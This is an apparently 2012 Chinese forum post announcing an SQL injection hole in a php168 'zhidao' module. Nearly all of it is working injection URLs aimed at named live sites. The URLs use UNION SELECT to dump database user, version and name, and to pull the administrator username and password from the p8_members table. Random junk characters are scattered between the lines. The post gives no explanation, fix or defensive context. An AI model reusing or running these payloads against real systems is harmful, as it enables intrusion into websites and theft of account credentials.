找回密码
 立即注册
查看: 3660|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--5 h; u" b- b# M/ \/ P; h. U8 Q
                                                         2 d" `1 c! u0 ]) F6 i/ Q' @( E
                                       ; e3 w% ?2 L$ b2 h1 u! }

/ s/ A$ }6 j" L, o
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
" {" q6 {! k0 N$ Z                                                     9 X( t- s" V2 l. K2 m, i& P
                                                                   + _0 s4 ^4 `4 ~  I$ i! X- d
                                                          C  z6 v+ r7 c% l2 M$ o' w
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
$ W1 t6 ~, Z9 s8 `+ K/ Q. s7 O" u5 y
# j" b1 O& }2 i8 J2 C
8 n& D8 z3 [  {  ^6 W! v, s$ Z. M
                                                            ( Y* P: A4 c3 S" s

3 q& l6 M& @1 \2 T8 |( h) {1 nhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--
. v) }# c: T' M# }  K9 T" @8 F  G& |

- _% O8 U, h' x# {2 M5 H! }  L( ^) X, G: V; O1 g
                                                                    
+ {  a' [3 E2 G& b+ J# i2 `

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表